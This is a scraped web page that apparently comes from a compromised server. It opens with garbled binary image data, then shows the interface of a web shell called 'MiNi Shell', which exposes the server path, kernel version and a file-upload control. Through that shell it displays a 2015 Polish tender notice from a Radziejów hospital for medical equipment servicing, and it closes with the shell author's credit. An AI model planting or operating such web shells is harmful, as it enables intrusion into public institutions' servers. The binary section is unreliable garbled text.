JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150522/122158-N-2015.html

<p class="kh_header"><b>Radziejów: Usługi w zakresie serwisowania sprzętu medycznego Samodzielnego Publicznego  Zakładu  Opieki  Zdrowotnej  w Radziejowie - oznaczenie sprawy PN-12/2015</b><br>
<b>Numer ogłoszenia: 122158 - 2015; data zamieszczenia: 22.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład  Opieki Zdrowotnej , ul. Szpitalna 3, 88-200 Radziejów, woj. kujawsko-pomorskie, tel. 054 2853631, faks 054 2853701.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalradziejow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie serwisowania sprzętu medycznego Samodzielnego Publicznego  Zakładu  Opieki  Zdrowotnej  w Radziejowie - oznaczenie sprawy PN-12/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi: przeglądów i konserwacji, urządzeń, aparatury i sprzętu pomiarowego - dalej zwanym sprzętem medyczny w Samodzielnym Publicznym Zakładzie Opieki Zdrowotnej w Radziejowie wraz z wymianą materiałów eksploatacyjnych przewidzianych do wymiany w ramach przeglądów i konserwacji przez producenta sprzętu w celu dopuszczenia sprzętu medycznego do dalszego użytkowania przez okres 36 miesięcy z podziałem na 23 grupy:
 
1.Defibrylatory
2.	Lampy
3.	Lampy bezcieniowe 
4.	Wanny i katedry 
5.	Aparaty EKG 
6.	Pompy infuzyjne 
7.	Aparatura fizjoterapeutyczna 
8.	Kardiomonitory 
9.	Inkubatory 
10.	Ssaki 
11.	Respiratory 
12.	Aparatura RTG 
13.	Stoły operacyjne 
14.	Stomatologia 
15.	Urządzenia fizjoterapeutyczne 
16.	Pulsoksymetr 
17.	Inne 
18.	Aparatura do diagnostyki laboratoryjnej I 
18.1 	Analizator KONEBL 20i/bioMerieux/
19.2	Licznik hematologiczny Swelab Alfa
19.3	 Analizator RKZ cobas b221
18.4	 Koagulometr Coag Chrom 3003 (CC 3003)
18.5	 Czytnik do pasków analizy moczu URISCAN PRO II
19.	Aparatura do diagnostyki laboratoryjnej II 
20.	Łóżka
21.	Aparatura i sprzęt okulistyczny
22.	RTG
23.	Endoskopia
1.	W skład przedmiotu zamówienia wchodzą w szczególności:
1)Przedmiot zamówienia obejmuje wszystkie niezbędne czynności wymagane w celu dopuszczenia w/w urządzeń medycznych do dalszego użytkowania zgodnie z instrukcją obsługi producenta sprzętu, w szczególności:
a) Utrzymanie sprawności techniczno - eksploatacyjnej urządzeń objętych niniejszym 	zamówieniem,
b) konserwację i zachowanie gotowości eksploatacyjnej opartej o zalecenia Zamawiającego,
c) przeprowadzanie okresowych przeglądów i kontroli stanu technicznego sprzętu 	medycznego, w terminach wynikających z zaleceń producenta i harmonogramu 	sporządzonego przez Zamawiającego i zapisanego w załączniku nr 3 do siwz. 
d) prowadzenie paszportów technicznych sprzętu medycznego tj. wprowadzanie 	każdorazowo wpisu o wykonanych czynnościach, uszkodzeniach oraz o dopuszczeniu lub 	nie urządzenia medycznego do dalszego użytkowania.
2.Szczegółowy opis przedmiotu zamówienia zawarty jest w rozdziale II siwz,  specyfikacji 	przedmiotowej formularz cenowy - załącznik nr 2 do siwz i harmonogramie przeglądów 	technicznych sprzętu medycznego - załącznik nr 3 do siwz. 
 II A. Przedmiot zamówienia obejmuje:  
1.Utrzymanie sprawności techniczno - eksploatacyjnej sprzętu medycznego objętego niniejszym zamówieniem. 
2.Konserwację sprzętu medycznego z zachowaniem gotowości eksploatacyjnej opartej o zlecenia Zamawiającego.
3.Przeprowadzanie okresowych przeglądów i kontroli stanu technicznego sprzętu medycznego,
w terminach wynikających z zaleceń producenta i harmonogramu 	sporządzonego przez Zamawiającego zapisanego w załączniku nr 3 do siwz. 
4.Prowadzenie paszportów technicznych sprzętu medycznego tj. wprowadzanie każdorazowo wpisu o wykonanych czynnościach, uszkodzeniach oraz o dopuszczeniu lub nie urządzenia medycznego do dalszego użytkowania.
5. Założenie paszportów sprzętu medycznego i ich prowadzenie dla zakupionego przez Zamawiającego sprzętu medycznego, o ile nie zostało to zastrzeżone przez producenta.
6. Wydawanie orzeczeń technicznych.
II B. Szczegółowe warunki realizacji zamówienia: 

1.Konserwacji i przeglądom podlegają sprzęt medyczny wymieniony w załączniku nr 3 do siwz. 
2.Okresowe przeglądy będą wykonywane w terminach wynikających z zaleceń producenta i harmonogramu sporządzonego przez Zamawiającego  zapisanego w załączniku nr 3 do siwz. 
3. Wykonawca zobowiązuje się do wykonania czynności konserwacyjnych i przeglądowych zgodnie harmonogramem określonym w załączniku nr 3 do siwz. 
4.Konieczność przeprowadzenia napraw lub wymiany części zamiennych na nowe, Wykonawca będzie uzgadniał z Działem Technicznym Zamawiającego, z podaniem przewidywanych kosztów w formie kalkulacji cenowej/kosztorysu. Wykonanie ich nastąpi po akceptacji kalkulacji cenowej/kosztorysu przez  kierownika  Zamawiającego. 
5.Przedmiot zamówienia winny realizować osoby posiadające kwalifikacje do serwisowania sprzętu i urządzeń medycznych.
6.Czynności konserwatorsko - sprawdzające sprzęt medyczny obejmują w szczególności:
1)  określenie rodzaju uszkodzenia,
2)  ewentualna naprawę zużytych podzespołów lub ich wymianę, po akceptacji 
     Zamawiającego,
3)  wymianę materiałów eksploatacyjnych, 
4)  sprawdzenie prawidłowości działania,
5)  sprawdzenie i czyszczenie elementów aparatury i urządzeń, 
6)  sprawdzanie instalacji, kontrola sprawności zaworów, 
7)  ustawienie (regulacja) wymaganych przez producenta parametrów,
8)  legalizację,   
7.Każda czynność konserwatorska  sprzętu medycznego musi zostać potwierdzona w karcie pracy i wpisana przez Wykonawcę do paszportu technicznego danego sprzętu medycznego.
8.W przypadku wyłączenia sprzętu medycznego z użytkowania do Wykonawcy należy obowiązek umieszczenia na niesprawnym sprzęcie  czytelnej informacji:  sprzęt niesprawny nie używać lub sprzęt przeznaczony do naprawy - nie używać 
9.Zgłoszenia awarii sprzętu medycznego  przekazywane będą telefonicznie potwierdzając je faksem lub na adres poczty elektronicznej przez upoważnionego przedstawiciela Zamawiającego. Wykonawca zobowiązany jest do niezwłocznej reakcji od przyjęcia zgłoszenia w celu podjęcia działań usunięcia awarii. Maksymalny czas reakcji Wykonawcy od momentu zgłoszenia wynosi 24 godziny ( w dni robocze), lub w pierwszy dzień roboczy po zgłoszeniu w dniu wolnym od pracy. 
10. Gwarancja na wymienione części zamienne materiały nie może być krótsza od gwarancji producenta.
11. Przeglądy techniczne wykonywane będą w terminach wynikających z harmonogramu sporządzonego przez Zamawiającego i zapisanego w załączniku nr 3 do siwz. Zakres czynności wykonywanych w ramach przeglądów powinien być zgodny z zaleceniami producenta i obowiązującymi przepisami.
12.Zamawiający zastrzega sobie prawo do zmiany ilości sprzętu podlegającego konserwacji i przeglądom, w ramach przeprowadzonych postępowań kasacyjnych, lub zmian związanych  ze zwiększeniem zakresu przedmiotu  zamówienia w przypadku wygaśnięcia gwarancji w okresie trwania umowy. 
13.Wykonawca w ramach realizacji usług i zaoferowanej w przetargu ceny zobowiązany będzie do wydawania orzeczeń technicznych dla sprzętu medycznego kwalifikowanego do kasacji. 

II C Informacje proceduralne: 
 1. Zamawiający dopuszcza składania ofert częściowych. 
 1)  	zamówienie obejmuje  23  grupy dopuszcza się składanie ofert częściowych na poszczególne 	grupy  lub na całość zamówienia z zastrzeżeniem, że część  pakiet 18 Aparatura do diagnostyki 	laboratoryjnej rozpatrywana będzie na pozycje).
2.  Informacja dotycząca ofert wariantowych.
1) Zamawiający nie dopuszcza składania ofert wariantowych w rozumieniu art. 83 Pzp.
3. Informacja o przewidywanych zamówieniach uzupełniających.
1)) Zamawiający nie przewiduje zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt. 6 i 7 Pzp.
4. Informacja na temat zastosowania aukcji elektronicznej.
1) Zamawiający nie przewiduje zastosowania aukcji elektronicznej.
5. Informacja na temat umowy ramowej.
1) Zamawiający nie zamierza zawrzeć umowy ramowej.
6. Informacja na temat ustanowienia  dynamicznego systemu zakupów.
1) Zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów.   
7. Zamawiający informuje, ze dopuszcza możliwość wykonania części zamówienia przez        	podwykonawców. W związku z powyższym Wykonawca w przypadku planowanego powierzenia realizacji części zamówienia podwykonawcom zobowiązany jest podać w oświadczeniu Wykonawcy o zakresie dostaw zleconych do wykonania podwykonawcom (zał. nr 7 do siwz) zakres przewidzianych do wykonania przez nich części zamówienia. 
8. Zamawiający nie przewiduje zebrania Wykonawców.   
9.  Zamawiający nie przewiduje udzielania zaliczek..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 27.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie przedmiotowego  warunku Wykonawca zobowiązany jest załączyć:   
a) oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 Pzp wg wzoru stanowiącego załącznik nr 4 do siwz.
Ocena spełnienia warunków udziału w postępowaniu dokonana będzie na podstawie analizy dostarczonych  dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie przedmiotowego  warunku Wykonawca zobowiązany jest załączyć:   
a)  oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 Pzp wg wzoru stanowiącego załącznik nr 4 do siwz
b) Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również	wykonywanych, usług w zakresie niezbędnym do wskazania spełnienia warunku wiedzy i 		doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli 	okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, 	przedmiotu, dat wykonania i podmiotów na rzecz, których usługi zostały wykonane, oraz 		załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie - na 			potwierdzenie niezbędnej wiedzy i doświadczenia Wykonawcy winni wykazać wykonanie co 	najmniej dwóch zamówień na usługi serwisowania konserwacji i napraw sprzętu medycznego 	o łącznej wartości wynoszącej nie mniej niż 75% całkowitej wartości brutto wynikającej ze 	złożonej oferty przetargowej. wg wzoru stanowiącego załącznik nr 4 a do siwz
	 
Ocena spełnienia warunków udziału w postępowaniu dokonana będzie na podstawie analizy dostarczonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie przedmiotowego  warunku Wykonawca zobowiązany jest załączyć:   
a) oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 Pzp wg wzoru stanowiącego załącznik nr 4 do siwz.
Ocena spełnienia warunków udziału w postępowaniu dokonana będzie na podstawie analizy dostarczonych  dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie przedmiotowego  warunku Wykonawca zobowiązany jest załączyć:   
a) oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 	ust.1 Pzp wg wzoru stanowiącego załącznik nr 4 do siwz,
b)  Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia , w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia, i wykształcenia niezbędnego do wykonywania zamówienia , a 	także zakresu wykonywanych przez nie czynności oraz informację o podstawie do 	dysponowania tymi osobami wg wzoru stanowiącego załącznik nr 4 b do siwz.      
c) Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, 	posiadają 	wymagane uprawnienia, jeżeli ustawy nakładają posiadania takich uprawnień, wg wzoru 	stanowiącego załącznik nr 4 c do siwz.    
	
Ocena spełnienia warunków udziału w postępowaniu dokonana będzie na podstawie analizy dostarczonych  dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie przedmiotowego  warunku Wykonawca zobowiązany jest załączyć: 
a) oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 Pzp wg wzoru stanowiącego załącznik nr 4 do siwz.
Ocena spełnienia warunków udziału w postępowaniu dokonana będzie na podstawie analizy dostarczonych  dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Okres udzielonej gwarancji - 2</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalradziejow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Administracji i Zamówień Publicznych Samodzielnego Publicznego Zakładu Opieki Zdrowotnej , ul. Szpitalna 3, 88-200 Radziejów - lokal nr 2-102 (pierwsze piętro budynek administracji)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2015 godzina 12:45, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Szpitalna 3, 88-200 Radziejów - lokal 2-100 sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com